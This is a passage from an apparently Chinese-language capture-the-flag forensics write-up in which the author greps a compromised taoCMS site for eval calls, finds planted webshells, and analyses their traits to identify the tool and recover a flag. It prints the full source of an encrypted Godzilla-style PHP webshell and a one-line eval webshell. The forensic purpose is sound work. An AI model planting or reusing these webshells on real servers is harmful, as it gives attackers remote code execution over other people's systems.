aoCMS\/display.php\n.\/data\/tplcache\/taoCMS\/comments.php\n.\/data\/tplcache\/wap_index.php\n.\/data\/tplcache\/menu.php\n.\/data\/tplcache\/editfile.php\n.\/data\/tplcache\/managecomment.php\n.\/data\/tplcache\/top.php\n.\/data\/tplcache\/header.php\n.\/data\/tplcache\/formsql.php\n.\/data\/tplcache\/managelink.php\n.\/data\/tplcache\/login.php\n.\/data\/tplcache\/main.php\n.\/data\/tplcache\/manageadmin.php\n.\/data\/tplcache\/footer.php\n.\/data\/tplcache\/managefile.php\n.\/data\/tplcache\/adminframe.php\n.\/rss.php\n.\/api.php\n.\/install.php\nroot@ip-10-0-10-3:\/var\/www\/html# grep -pnir "eval"\ngrep: invalid option -- 'p'\nUsage: grep [OPTION]... PATTERNS [FILE]...\nTry 'grep --help' for more information.\nroot@ip-10-0-10-3:\/var\/www\/html# grep -Pnir "eval"\nadmin\/template\/images\/xheditor\/xheditor-1.1.14-zh-cn.min.js:2:if(q){try{q=eval("("+q[1]+")")}catch(t){}h=e.extend({},q,h)}q=new ra(this,h);if(q.init())this.xheditor=q,o.push(q)}});0===o.length&&(o=!1);1===o.length&&(o=o[0]);return o};var aa=0,S=!1,sa=!0,ta=!1,Sa=!1,t,ba,ca,da,K,Ea,ea,Fa,Ga,Ha,A;e("script[src*=xheditor]").each(function(){var e=this.src;if(e.match(\/xheditor[^\\\/]*\\.js\/i))return A=e.replace(\/[\\?#].*$\/,"").replace(\/(^|[\\\/\\\\])[^\\\/]*$\/,"$1"),!1});if(h){try{document.execCommand("BackgroundImageCache",!1,!0)}catch(qb){}(I=e.fn.jquery)&&I.match(\/^1\\.[67]\/)&&\nadmin\/template\/images\/xheditor\/xheditor-1.1.14-zh-cn.min.js:93:var h=e(".xheFile",i);h.change(function(){d.startUpload(h[0],b,c,f)});setTimeout(function(){a.closest(".xheDialog").bind("dragenter dragover",N).bind("drop",function(a){var a=a.originalEvent.dataTransfer,e;j&&a&&(e=a.files)&&0<e.length&&d.startUpload(e,b,c,f);return!1})},10)}};this.startUpload=function(a,b,c,f){function i(a,c){var e=Object,g=!1;try{e=eval("("+a+")")}catch(i){}e.err===$||e.msg===$?alert(b+" \\u4e0a\\u4f20\\u63a5\\u53e3\\u53d1\\u751f\\u9519\\u8bef\\uff01\\r\\n\\r\\n\\u8fd4\\u56de\\u7684\\u9519\\u8bef\\u5185\\u5bb9\\u4e3a: \\r\\n\\r\\n"+\nadmin\/template\/images\/xheditor\/xheditor-1.1.14-zh-cn.min.js:99:n=r.name}catch(a){}}function l(a){r.document.write("");d.removeModal();null!=a&&c(a)}var b=e('<iframe frameborder="0" src="'+b.replace(\/{editorRoot}\/ig,A)+(\/\\?\/.test(b)?"&":"?")+"parenthost="+location.host+'" style="width:100%;height:100%;display:none;" \/><div class="xheModalIfmWait"><\/div>'),o=b.eq(0),s=b.eq(1);d.showModal(a,b,f,g,h);var r=o[0].contentWindow,n;j();o.load(function(){j();if(n){var a=!0;try{n=eval("("+unescape(n)+")")}catch(b){a=!1}if(a)return l(n)}s.is(":visible")&&(o.show().focus(),\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:20:e);if(e=e&&e.events){delete f.handle;f.events={};for(var h in e)for(var l in e[h])c.event.add(this,h,e[h][l],e[h][l].data)}}})}function Oa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function oa(a,b,d){var e=b==="width"?a.offsetWidth:a.offsetHeight;if(d==="border")return e;c.each(b==="width"?Pa:Qa,function(){d||(e-=parseFloat(c.css(a,"padding"+this))||0);if(d==="margin")e+=parseFloat(c.css(a,\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:31:!F.call(j,"constructor")&&!F.call(j.constructor.prototype,"isPrototypeOf"))return false;for(var s in j);return s===B||F.call(j,s)},isEmptyObject:function(j){for(var s in j)return false;return true},error:function(j){throw j;},parseJSON:function(j){if(typeof j!=="string"||!j)return null;j=b.trim(j);if(C.test(j.replace(J,"@").replace(w,"]").replace(I,"")))return E.JSON&&E.JSON.parse?E.JSON.parse(j):(new Function("return "+j))();else b.error("Invalid JSON: "+j)},noop:function(){},globalEval:function(j){if(j&&\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:32:l.test(j)){var s=t.getElementsByTagName("head")[0]||t.documentElement,v=t.createElement("script");v.type="text\/javascript";if(b.support.scriptEval)v.appendChild(t.createTextNode(j));else v.text=j;s.insertBefore(v,s.firstChild);s.removeChild(v)}},nodeName:function(j,s){return j.nodeName&&j.nodeName.toUpperCase()===s.toUpperCase()},each:function(j,s,v){var z,H=0,G=j.length,K=G===B||b.isFunction(j);if(v)if(K)for(z in j){if(s.apply(j[z],v)===false)break}else for(;H<G;){if(s.apply(j[H++],v)===false)break}else if(K)for(z in j){if(s.call(j[z],\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:39:scriptEval:false,noCloneEvent:true,boxModel:null,inlineBlockNeedsLayout:false,shrinkWrapBlocks:false,reliableHiddenOffsets:true};l.disabled=true;c.support.optDisabled=!k.disabled;b.type="text\/javascript";try{b.appendChild(t.createTextNode("window."+e+"=1;"))}catch(o){}a.insertBefore(b,a.firstChild);if(E[e]){c.support.scriptEval=true;delete E[e]}try{delete b.test}catch(x){c.support.deleteExpando=false}a.removeChild(b);if(d.attachEvent&&d.fireEvent){d.attachEvent("onclick",function r(){c.support.noCloneEvent=\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:54:attr:function(a,b,d,e){if(!a||a.nodeType===3||a.nodeType===8)return B;if(e&&b in c.attrFn)return c(a)[b](d);e=a.nodeType!==1||!c.isXMLDoc(a);var f=d!==B;b=e&&c.props[b]||b;var h=Ta.test(b);if((b in a||a[b]!==B)&&e&&!h){if(f){b==="type"&&Ua.test(a.nodeName)&&a.parentNode&&c.error("type property can't be changed");if(d===null)a.nodeType===1&&a.removeAttribute(b);else a[b]=d}if(c.nodeName(a,"form")&&a.getAttributeNode(b))return a.getAttributeNode(b).nodeValue;if(b==="tabIndex")return(b=a.getAttributeNode("tabIndex"))&&\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:97:for(;u;){p.unshift(u);u=u.parentNode}for(u=m;u;){q.unshift(u);u=u.parentNode}n=p.length;m=q.length;for(u=0;u<n&&u<m;u++)if(p[u]!==q[u])return I(p[u],q[u]);return u===n?I(g,q[u],-1):I(p[u],i,1)};I=function(g,i,n){if(g===i)return n;for(g=g.nextSibling;g;){if(g===i)return-1;g=g.nextSibling}return 1}}k.getText=function(g){for(var i="",n,m=0;g[m];m++){n=g[m];if(n.nodeType===3||n.nodeType===4)i+=n.nodeValue;else if(n.nodeType!==8)i+=k.getText(n.childNodes)}return i};(function(){var g=t.createElement("div"),\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:98:i="script"+(new Date).getTime(),n=t.documentElement;g.innerHTML="<a name='"+i+"'\/>";n.insertBefore(g,n.firstChild);if(t.getElementById(i)){o.find.ID=function(m,p,q){if(typeof p.getElementById!=="undefined"&&!q)return(p=p.getElementById(m[1]))?p.id===m[1]||typeof p.getAttributeNode!=="undefined"&&p.getAttributeNode("id").nodeValue===m[1]?[p]:B:[]};o.filter.ID=function(m,p){var q=typeof m.getAttributeNode!=="undefined"&&m.getAttributeNode("id");return m.nodeType===1&&q&&q.nodeValue===p}}n.removeChild(g);\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:104:c.contains=k.contains})();var Za=\/Until$\/,$a=\/^(?:parents|prevUntil|prevAll)\/,ab=\/,\/,Na=\/^.[^:#\\[\\.,]*$\/,bb=Array.prototype.slice,cb=c.expr.match.POS;c.fn.extend({find:function(a){for(var b=this.pushStack("","find",a),d=0,e=0,f=this.length;e<f;e++){d=b.length;c.find(a,this[e],b);if(e>0)for(var h=d;h<b.length;h++)for(var l=0;l<d;l++)if(b[l]===b[h]){b.splice(h--,1);break}}return b},has:function(a){var b=c(a);return this.filter(function(){for(var d=0,e=b.length;d<e;d++)if(c.contains(this,b[d]))return true})},\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:108:2,"previousSibling")},nextAll:function(a){return c.dir(a,"nextSibling")},prevAll:function(a){return c.dir(a,"previousSibling")},nextUntil:function(a,b,d){return c.dir(a,"nextSibling",d)},prevUntil:function(a,b,d){return c.dir(a,"previousSibling",d)},siblings:function(a){return c.sibling(a.parentNode.firstChild,a)},children:function(a){return c.sibling(a.firstChild)},contents:function(a){return c.nodeName(a,"iframe")?a.contentDocument||a.contentWindow.document:c.makeArray(a.childNodes)}},function(a,\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:144:e=a.getResponseHeader("Etag");if(d)c.lastModified[b]=d;if(e)c.etag[b]=e;return a.status===304},httpData:function(a,b,d){var e=a.getResponseHeader("content-type")||"",f=b==="xml"||!b&&e.indexOf("xml")>=0;a=f?a.responseXML:a.responseText;f&&a.documentElement.nodeName==="parsererror"&&c.error("parsererror");if(d&&d.dataFilter)a=d.dataFilter(a,b);if(typeof a==="string")if(b==="json"||!b&&e.indexOf("json")>=0)a=c.parseJSON(a);else if(b==="script"||!b&&e.indexOf("javascript")>=0)c.globalEval(a);return a}});\ninclude\/gz.php:23: eval($payload);\ninclude\/Db\/.Mysqli.php:22: eval($payload);\nshell.php:1:<?php phpinfo();@eval($_REQUEST[1]);?>\ntemplate\/taoCMS\/images\/tao.js:53: var resData=eval("["+xmlHttp.responseText+"]");<\/code><\/pre>\n\u521d\u6b65\u627e\u5230\u51e0\u4e2a\uff0c\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\uff0c\u5728gz.php<\/code>\u627e\u5230\u4e86\u4e00\u4e2aflag\uff1a<\/p>\n# root@ip-10-0-10-3:\/var\/www\/html# cat include\/gz.php\n<?php\n@session_start();\n@set_time_limit(0);\n@error_reporting(0);\nfunction encode($D,$K){\n for($i=0;$i<strlen($D);$i++) {\n $c = $K[$i+1&15];\n $D[$i] = $D[$i]^$c;\n }\n return $D;\n}\n\/\/027ccd04-5065-48b6-a32d-77c704a5e26d\n$payloadName='payload';\n$key='3c6e0b8a9c15224a';\n$data=file_get_contents("php:\/\/input");\nif ($data!==false){\n $data=encode($data,$key);\n if (isset($_SESSION[$payloadName])){\n $payload=encode($_SESSION[$payloadName],$key);\n if (strpos($payload,"getBasicsInfo")===false){\n $payload=encode($payload,$key);\n }\n eval($payload);\n echo encode(@run($data),$key);\n }else{\n if (strpos($data,"getBasicsInfo")!==false){\n $_SESSION[$payloadName]=encode($data,$key);\n }\n }\n}<\/code><\/pre>\nD\u76fe\u626b\u63cf<\/h3>\n
\u9996\u5148\u5148\u5bf9\u7f51\u7ad9\u8fdb\u884c\u6253\u5305\uff0c\u53ef\u4ee5\u7528SFTP<\/code>\u8fdb\u884c\u4f20\u8f93\uff1a<\/p>\n<\/div><\/p>\n\u7136\u540e\u6574\u4e2a\u4e22\u5230D\u76fe\uff1a<\/p>\n
<\/div><\/p>\n\u4e5f\u53ef\u4ee5\u627e\u5230\uff01<\/p>\n
flag{027ccd04-5065-48b6-a32d-77c704a5e26d}<\/code><\/pre>\n\u9ed1\u5ba2\u4f7f\u7528\u7684\u4ec0\u4e48\u5de5\u5177\u7684shell<\/h2>\n
\u5206\u6790\u4e00\u4e0b\u8fd9\u4e2a\u6728\u9a6c\uff0c\u53d1\u73b0\u4e86\u4e00\u4e9b\u5f31\u7279\u5f81<\/p>\n
@session_start(); # \u521b\u5efa\u4f1a\u8bdd\n@set_time_limit(0); # \u8fde\u63a5\u65f6\u957f\u4e0d\u9650\n@error_reporting(0); # \u5173\u6389\u9519\u8bef\u62a5\u544a<\/code><\/pre>\n\u7136\u540e\u6211\u76f4\u63a5\u641c\u4e86\u4e00\u4e0b\uff0c\u53d1\u73b0\u54e5\u65af\u62c9\u7684php\u9a6c\u5b58\u5728\u4ee5\u4e0b\u7279\u5f81\uff1a<\/p>\n
\nrun()<\/code>\u65b9\u6cd5\u662f\u5199\u6b7b\u5728\u653b\u51fb\u8377\u8f7d\u91cc\u9762\u7684\uff0c\u4ee3\u7801\u4e00\u5b9a\u4f1a\u8c03\u7528\u8fd9\u4e2a\u65b9\u6cd5\u6267\u884c\u4f20\u5165\u7684\u53c2\u6570\u3002<\/li>\n- \u6709\u4e00\u4e2a\u5411
SESSION<\/code>\u4e2d\u5b58\u50a8\u653b\u51fb\u8377\u8f7d\u7684\u8fc7\u7a0b\u3002<\/li>\n- \u4f1a\u5c06\u4f20\u5165\u7684\u53c2\u6570\u89e3\u5bc6\u3001\u62fc\u63a5\u540e\u53d6MD5\uff0c\u524d16\u4f4d\u52a0\u5230\u56de\u663e\u7684\u524d\u7aef\uff0c\u5176\u4f59\u7684\u90e8\u5206\u52a0\u5230\u56de\u663e\u7684\u540e\u7aef\uff08\u8fd9\u91cc\u597d\u50cf\u6ca1\u6709\u6d89\u53ca\u5230\uff0c\u8fd9\u4e2a\u7279\u5f81\u8fd8\u6bd4\u8f83\u660e\u663e\u7684\uff09<\/li>\n<\/ul>\n
![\"image-20240613173747037\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406131812884.png\")
<\/div><\/p>\n![\"image-20240613173808087\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406131812885.png\")
<\/div><\/p>\n![\"image-20240613175439848\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406131812886.png\")
<\/div><\/p>\n